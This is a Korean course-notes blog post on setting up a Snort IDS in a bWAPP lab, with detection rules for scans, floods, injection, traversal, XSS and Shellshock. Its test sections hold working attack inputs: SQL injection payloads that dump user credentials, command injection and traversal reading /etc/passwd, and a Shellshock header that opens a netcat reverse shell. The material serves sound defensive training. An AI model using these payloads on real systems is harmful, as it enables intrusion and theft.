메가IT아카데미 국기과정/JAVA와 웹보안

[1-12] BWAPP 환경 IDS(Snort) 구성

한님폐하 2022. 9. 13. 10:43

1. 공격자 네트워크 설정

vi /etc/network/interfaces
source /etc/network/interfaces.d/*
auto lo
iface lo inet loopback
auto eth0 eth1
iface eth0 inet static
	address 192.168.2.50
	network 192.168.2.0
	netmask 255.255.255.0
	gateway 192.168.2.254
	broadcast 192.168.2.255
iface eth1 inet static
	address 192.168.20.50
	network 192.168.20.0
	netmask 255.255.255.0
	#gateway 192.168.20.100
	broadcast 192.168.20.255
up route add -net 192.168.20.0 netmask 255.255.255.0 gw 192.168.2.100
service networking restart

 

2. bWAPP 텔넷 데몬 설치

apt-get install telnetd

 

3. Snort

3-0. Snort 설치와 활성화

apt-get -y install snort snort-common snort-common-libraries snort-doc snort-rules-default
dpkg -l | grep snort
vi /etc/snort/snort.conf
ipvar HOME_NET 192.168.20.0/24
update-rc.d snort enable
service snort start
service snort status

 

3-1. snort 룰 디렉토리

  • snort 설치시 기본적으로 제공되는 룰 파일들이 '/etc/snort/rules' 디렉토리에 존재한다.
  • IDS/IPS 제조사 및 snort 사이트에서 룰을 기본적으로 제공한다.
  • 이때 최소 12개월 전에 제작된 룰까지 사용하는 것을 권장한다.
  • 만약, 룰을 직접 설정하여 운영할 경우, 'local.rules' 파일에 룰을 추가하는 것을 권장한다.
cat /etc/snort/rules/local.rules

 

3-2. snort 룰 구조

룰헤더             옵션
Action Protocol SrcIP SrcPort -> DstIP DstPort Option
alert tcp 192.168.2.0/24 any -> 192.168.20.200/32 80 (msg:"SQL Injection"; content:"union"; nocase; sid:3000001; rev:1;) 

 

  • Action 유형
alert 경고 발생 및 로그 기록
log 로그 기록
pass 패켓 무시
drop  패켓 차단 및 로그 기록
reject 패켓 차단 및 로그 기록(TCP - TCP RST 응답, UDP - ICMP Unreachable 응답)
sdrop 패켓 차단 및 로그 기록 없음

 

[참고] IDS & IPS

  • IDS로 구성할 경우, action 명령은 'alert'로 설정한다.
  • IPS로 구성할 경우, action 명령은 'drop', 'reject'로 설정한다. 단, 인라인 구조로 연결해야 한다.

 

  • Protocol 유형
tcp TCP 탐지
udp UDP 탐지
ip IP 전체 탐지
icmp ICMP 메세지 탐지
any 전체

 

  • SrcIP/DstIP 형식
192.168.20.50/32 192.168.20.50 Host
192.168.20.0/24 192.168.20.0/24 서브넷
[192.168.20.0/24, 172.20.0.0/16] 192.168.20.0/24, 172.20.0.0/16 서브넷
[192.168.20.204/32, 192.168.20.205/32] 192.168.20.204, 192.168.20.205 
!192.168.20.0/24 192.168.20.0/24를 제외한 나머지 서브넷
$HOME_NET 내부 네트워크 IP 대역 변수
$EXTERNAL_NET 외부 네트워크 IP 대역 변수
$XXX_SERVERS 특정 서버 IP 주소 변수

 

  • SrcPort/DstPort
80 80번 포트
1:500 1~500번 포트
!80 80번 포트를 제외한 나머지 포트
!1:500 1~500번 포트를 제외한 나머지 포트
any 모든 포트

 

  • 방향 지정
 -> 좌측이 출발지, 우측이 목적지로 되어 좌측에서 우측로 가는 패켓 탐지
 <> 쌍방향 탐지

 

  • 일반 옵션
; 옵션의 구분자 sid:3000001; rev:1;
msg 경고 이벤트 메세지 msg:"ICMP Ping test";
sid 룰 식별자 (100~1000000은 snort.org 사용, 3000000번 이상 권장) sid:3000001;
rev 룰 버전, 수정될 경우 1씩 증가 rev:1;
priority 우선 순위 (값이 작을수록 먼저 매칭), 범위 : 1~10 priority:1;
classtype 스노트 룰 분류 classtype:분류이름;
reference 취약점 참고 배포 URL 정보 reference:이름 http://~;

 

  • 흐름 옵션
to_server 또는 from_client 클라이언트에서 서버로 전송되는 패켓에 대해서 룰에 매칭되는지 검사
to_client 또는 from_server 서버에서 클라이언트로 전송되는 패켓에 대해서 룰에 매칭되는지 검사
established 세션이 연결된 상태의 패켓에 대해서 룰에 매칭되는지 검사
stateless 세션 연결 유무와 상관 없이 룰에 매칭되는지 검사
flow:to_server,established 세션 연결된 상태 + 클라이언트에서 서버로 전송되는 패켓에 대해서 룰에 매칭되는지 검사

 

  • 페이로드 탐색 옵션
content  문자/숫자 탐지 content: "xxx";, content: "|16진수 16진수|";
nocase 대소문자 구분 없이 탐지 content: "xxx"; nocase; 
flags TCP Flag 탐지 flags:SA; ,  flags:FPU;
dsize 데이터 크기 탐지 dsize:1000<>1500; , dsize:0;
itype ICMP 패켓 탐지 itype:8; , itype:0;

 

  • HTTP 탐색 옵션
http_method 페이로드 앞부분 HTTP 메소드 패턴 매칭 
http_uri  페이로드의 HTTP URI 패턴 매칭
http_cookie 페이로드의 HTTP 쿠키 패턴 매칭
http_header HTTP 요청/응답 Header 내용 패턴 매칭
http_client_body HTTP 요청/응답 Body 내용 패턴 매칭
http_stat_code HTTP 응답 상태 코드 패턴 매칭
http_stat_message HTTP 응답 상태 메세지 패턴 매칭

 

[참고] HTTP 응답 코드 및 메세지 유형

 

HTTP 상태 코드 정리 | 와탭 블로그

HTTP 응답 상태 코드의 목록을 정리하여 소개합니다. 클라이언트의 요청에 따라 어떻게 서버가 응답하는지 알아봅시다.

www.whatap.io

 

3-3. snort 룰 설정

3-3-1. 기본적인 룰 탐지

vi /etc/snort/rules/local.rules
# ICMP
alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"## ICMP Echo ##"; itype:8; sid:3000001; rev:1;)
alert icmp $HOME_NET any -> $EXTERNAL_NET any (msg:"## ICMP Echo-Reply ##"; itype:0; sid:3000002; rev:1;)
# FTP
alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"## FTP Request ##"; content:"USER"; sid:3000003; rev:1;)
alert tcp $HOME_NET 21 -> $EXTERNAL_NET any (msg:"## FTP Response ##"; content:"ProFTPD"; sid:3000004; rev:1;)
# TELNET
alert tcp $EXTERNAL_NET any -> $HOME_NET 23 (msg:"## Telnet Request ##"; sid:3000005; rev:1;)
alert tcp $HOME_NET 23 -> $EXTERNAL_NET any (msg:"## Telnet Response ##"; content:"login"; sid:3000006; rev:1;)
# Web
alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"## HTTP Request ##"; sid:3000007; rev:1;)
alert tcp $HOME_NET 80 -> $EXTERNAL_NET any (msg:"## HTTP Response ##"; sid:3000008; rev:1;)
service snort restart
service snort stop
snort -q -A console -b -c /etc/snort/snort.conf

 

  • 공격자 혹은 게이트웨이에서 다음과 같이 테스트 한다.
ping -c 5 [타겟 IP]
telnet [타겟 IP]
firefox http://[타겟 IP] &
ftp [타겟 IP]

 

3-3-2. NMAP 스캔 탐지

vi /etc/snort/rules/local.rules
# NMAP Scan
alert tcp any any -> $HOME_NET any (msg:"## NMAP Half Open-SCAN ##"; flags:S,12; flow:to_server,not_established; sid:3000009; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"## NMAP FIN-SCAN ##"; flags:F,12; flow:not_established; sid:3000010; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"## NMAP XMAS-SCAN ##"; flags:FPU; sid:3000011; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"## NMAP NULL-SCAN ##"; flags:0,12; sid:3000012; rev:1;)
service snort restart
service snort stop
snort -q -A console -b -c /etc/snort/snort.conf

 

  • 공격자 혹은 게이트웨이에서 다음과 같이 테스트 한다.
nmap -sS -p 21 [타겟 IP]
nmap -sF -p 21 [타겟 IP]
nmap -sX -p 21 [타겟 IP]
nmap -sN -p 21 [타겟 IP]

 

[참고] threshold, track, count, seconds

threshold:type threashold 매 s초 동안 c번째 이벤트마다 action 실시
threshold:type both 매 s초 동안 c번째 이벤트 시 한번 action 실시
threshold:type limit 매 s초 동안 c번째 이벤트까지 action 실시
track by_src 출발지 동일한 IP 기준으로 탐지 (1:N)
track by_dst 목적지 동일한 IP 기준으로 탐지 (N:1)
count 로그 발생 횟수
seconds 시간(초 단위) 
(flags:S; threshold:type threshold, track by_dst, count 100, seconds 1;)

 

3-3-3. DoS && DDoS 공격 탐지

vi /etc/snort/rules/local.rules
# DoS && DDoS
alert icmp any any -> $HOME_NET any (msg:"## ICMP Flooding-threshold Attack ##"; itype:8; icode:0; threshold:type threshold, track by_src, count 5, seconds 1; sid:3000013; rev:1;)
alert icmp any any -> $HOME_NET any (msg:"## ICMP Flooding-limit Attack ##"; itype:8; icode:0; threshold:type limit, track by_src, count 5, seconds 1; sid:3000014; rev:1;)
alert icmp any any -> $HOME_NET any (msg:"## Ping of Death Attack ##"; itype:8; icode:0; content:"|5858585858585858|"; threshold:type limit, track by_dst, count 5, seconds 1; sid:3000015; rev:1;)
alert ip any any -> $HOME_NET any (msg:"## Land Attack ##"; sameip; sid:3000016; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"## TCP Syn Flooding Attack ##"; flow:stateless; flags:S,12; threshold:type limit, track by_dst, count 5, seconds 1; sid:3000017; rev:1;)
service snort restart
service snort stop
snort -q -A console -b -c /etc/snort/snort.conf

 

  • 공격자 혹은 게이트웨이에서 다음과 같이 테스트 한다.
hping3 -i eth0 --icmp [타겟 IP] --fast
hping3 -i eth0 --icmp [타겟 IP] --fast -d 50000	
hping3 -i eth0 --icmp [타겟 IP] --spoof [타겟 IP] --fast
 hping3 -i eth0 --syn [타겟 IP] -p 80 --fast

 

3-3-4. 웹 서버 공격 탐지

vi /etc/snort/rules/local.rules
# Web Attack
alert tcp any any -> $HOME_NET 80 (msg:"## Web Attack ##"; content:"GET /cmd.exe"; nocase; sid:3000018; rev:1;) 
service snort restart
service snort stop
snort -q -A console -b -c /etc/snort/snort.conf

 

  • 공격자 혹은 게이트웨이에서 다음과 같이 테스트 한다.
wafw00f http://192.168.20.205

 

 

3-3-5. OS Command 인젝션 공격 탐지

vi /etc/snort/rules/local.rules
# OS Command Injection
alert tcp any any -> $HOME_NET any (msg:"OS Command Injection URI \;"; flow:to_server,established; content:"%3b"; nocase; http_uri; sid:3000019; rev:1;) 
alert tcp any any -> $HOME_NET any (msg:"OS Command Injection URI \/"; flow:to_server,established; content:"%2f"; nocase; http_uri; sid:3000020; rev:1;) 
alert tcp any any -> $HOME_NET any (msg:"OS Command Injection URI \&&"; flow:to_server,established; content:"%26%26"; nocase; http_uri; sid:3000021; rev:1;) 
alert tcp any any -> $HOME_NET any (msg:"OS Command Injection Body \;"; flow:to_server,established; content:"%3b"; nocase; http_client_body; sid:3000022; rev:1;) 
alert tcp any any -> $HOME_NET any (msg:"OS Command Injection Body \/"; flow:to_server,established; content:"%2f"; nocase; http_client_body; sid:3000023; rev:1;) 
alert tcp any any -> $HOME_NET any (msg:"OS Command Injection Body \&&"; flow:to_server,established; content:"%26%26"; nocase; http_client_body; sid:3000024; rev:1;)
service snort restart
service snort stop
snort -q -A console -b -c /etc/snort/snort.conf

 

  • 공격자 혹은 게이트웨이에서 bWAPP 'OS Command Injection' 시나리오로 이동하여 다음과 같이 테스트 한다.
DNS lookup: www.google.com ; cat /etc/passwd | head -3

 

3-3-6. SQL 인젝션 공격 탐지

vi /etc/snort/rules/local.rules
# SQL Injection
alert tcp any any -> $HOME_NET any (msg:"SQL Injection URI AND"; flow:established,to_server; content:"AND"; nocase; http_uri; sid:3000025; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"SQL Injection URI OR"; flow:established,to_server; content:"OR"; nocase; http_uri; sid:3000026; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"SQL Injection URI UNION"; flow:established,to_server; content:"UNION"; nocase; http_uri; sid:3000027; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"SQL Injection URI SELECT"; flow:established,to_server; content:"SELECT"; nocase; http_uri; sid:3000028; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"SQL Injection Body AND"; flow:established,to_server; content:"AND"; nocase; http_client_body; sid:3000029; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"SQL Injection Body OR"; flow:established,to_server; content:"OR"; nocase; http_client_body; sid:3000030; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"SQL Injection Body UNION"; flow:established,to_server; content:"UNION"; nocase; http_client_body; sid:3000031; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"SQL Injection Body SELECT"; flow:established,to_server; content:"SELECT"; nocase; http_client_body; sid:3000032; rev:1;)
service snort restart
service snort stop
snort -q -A console -b -c /etc/snort/snort.conf

 

  • 공격자 혹은 게이트웨이에서 bWAPP 'SQL Injection (GET/Search)' 시나리오로 이동하여 다음과 같이 테스트 한다.
1' or 1=1 #
1' and 1=1 #
0' union select all 1,2,3,4,5,6,7 #
0' union select all 1,database(),user(),system_user(),version(),6,7 #
0' union select all 1,table_schema,table_name,4,5,6,7 from information_schema.tables #
0' union select all 1,table_schema,table_name,4,5,6,7 from information_schema.tables limit 17,5 #
0' union select all 1,table_schema,table_name,4,column_name,6,7 from information_schema.columns #
0' union select all 1,table_schema,table_name,4,column_name,6,7 from information_schema.columns where table_name='users' #
0' union select all 1,table_schema,table_name,4,column_name,6,7 from information_schema.columns where table_name='users' and table_schema='bwapp' #
0' union select all 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users' and table_schema='bwapp' #
0' union select all 1,concat(id,login),password,email,secret,6,7 from users #

 

 

3-3-7. XSS 인젝션 공격 탐지

vi /etc/snort/rules/local.rules
# XSS Injection
alert tcp any any -> $HOME_NET any (msg:"XSS Injection URI"; flow:established,to_server; content:"</script>"; nocase; http_uri; sid:3000033; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"XSS Injection Body"; flow:established,to_server; content:"%3C%2Fscript%3E"; nocase; http_client_body; sid:3000034; rev:1;)
service snort restart
service snort stop
snort -q -A console -b -c /etc/snort/snort.conf

 

  • 공격자 혹은 게이트웨이에서 bWAPP 'XSS - Reflected (POST)' 시나리오로 이동하여 다음과 같이 테스트 한다.
<script>alert("test")</script>
<script>alert(document.cookie)</script>

 

3-3-8. Path Traversal 공격 탐지

vi /etc/snort/rules/local.rules
# Path Traversal
alert tcp any any -> $HOME_NET any (msg:"Path Traversal URI \../"; content:"../"; nocase; http_uri; sid:3000035; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"Path Traversal URI \/etc"; content:"/etc"; nocase; http_uri; sid:3000036; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"Path Traversal Body \../"; content:"../"; nocase; http_client_body; sid:3000037; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"Path Traversal Body \/etc"; content:"/etc"; nocase; http_client_body; sid:3000038; rev:1;)
service snort restart
service snort stop
snort -q -A console -b -c /etc/snort/snort.conf

 

  • 공격자  bWAPP 'Directory Traversal - Directories'  시나리오로 이동하여 다음과 같이 테스트 한다.
http://192.168.20.205/bWAPP/directory_traversal_2.php?directory=../../../etc
http://192.168.20.205/bWAPP/directory_traversal_2.php?directory=/etc

 

  • 공격자 'Directory Traversal - Files' 시나리오로 이동하여 다음과 같이 테스트 한다.
http://192.168.20.205/bWAPP/directory_traversal_1.php?page=../../../etc/passwd
http://192.168.20.205/bWAPP/directory_traversal_1.php?page=/etc/passwd

 

3-3-9. iframe HTML 인젝션 공격 탐지

vi /etc/snort/rules/local.rules
# iframe HTML
alert tcp any any -> $HOME_NET any (msg:"iframe HTML Injection URI"; content:"<iframe"; nocase; http_uri; sid:3000039; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"iframe HTML Injection Body-1 \../"; content:"<iframe"; nocase; http_client_body; sid:3000040; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"iframe HTML Injection Body-2 \../"; content:"%3ciframe"; nocase; http_client_body; sid:3000041; rev:1;)
service snort restart
service snort stop
snort -q -A console -b -c /etc/snort/snort.conf

 

  • 공격자  bWAPP 'iFrame Injection' 시나리오로 이동하여 다음과 같이 테스트 한다.
http://[타겟 IP]/bWAPP/iframei.php?ParamUrl=robots.txt" height="0" width="0"></iframe><iframe frameborder="0" src=http://www.orak-1004.com height="800" width="800"></iframe><iframe>&ParamWidth=250&ParamHeight=250

 

 

3-3-9. Bash Shellshock 공격 탐지

 vi /etc/snort/rules/local.rules
# Bash Shellshock
alert tcp any any -> $HOME_NET any (msg:"Bash Shellshock-1"; flow:established,to_server; content:"|28 29 20 7b|"; http_header; sid:3000042; rev:1;)
alert tcp any any -> $HOME_NET any (msg:"Bash Shellshock-2"; flow:established,to_server; content:"() {"; http_header; sid:3000043; rev:1;)
service snort restart
service snort stop
snort -q -A console -b -c /etc/snort/snort.conf

 

[참고] ASCII

28  (
29 )
20 공백
7b {

 

  • 공격자  bWAPP 'Shellshock Vulnerability (CGI)' 시나리오로 이동하여 다음과 같이 테스트 한다.
  • 버프 슈트를 이용하여 '/bWAPP/cgi-bin/shellshock.sh' 페이지에 Bash Shellshock 코드를 인젝션한다.
GET /bWAPP/cgi-bin/shellshock.sh HTTP/1.1
Host: 192.168.20.205
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.205/bWAPP/shellshock.php
Cookie: security_level=0; PHPSESSID=4cd4e9d0cab55e06b426a893d532706f
Connection: close
Upgrade-Insecure-Requests: 1

 

  • 위의 Referer: 내용을 다음과 같이 변경하고 인터셉트 off 를 실시한다.
Referer: () { :;}; echo "Shellshock Vulnerability TEST" $(/bin/sh -c "nc -e /bin/bash [공격자 IP] 4444")

 

3-4.  웹 서버 로그 분석

  • bWAPP에서 다음과 같이 웹 서버 로그 파일을 삭제하고 웹 서비스를 재시작한다.
  • 'notepad++'를 이용하여 'access.log' 및 'snort 이벤트 로그' 파일를 분석하여 다음과 같은 내용을 파악한다.
  • ① 공격 유형
    ② 공격 패턴
    ③ 공격 날짜/시간
    ④ 공격 시스템 주소
    ⑤ snort 룰 탐지 여부 확인
sudo /etc/init.d/apache2 restart
cat /var/log/apache2/access.log
저작자표시 비영리 변경금지 (새창열림)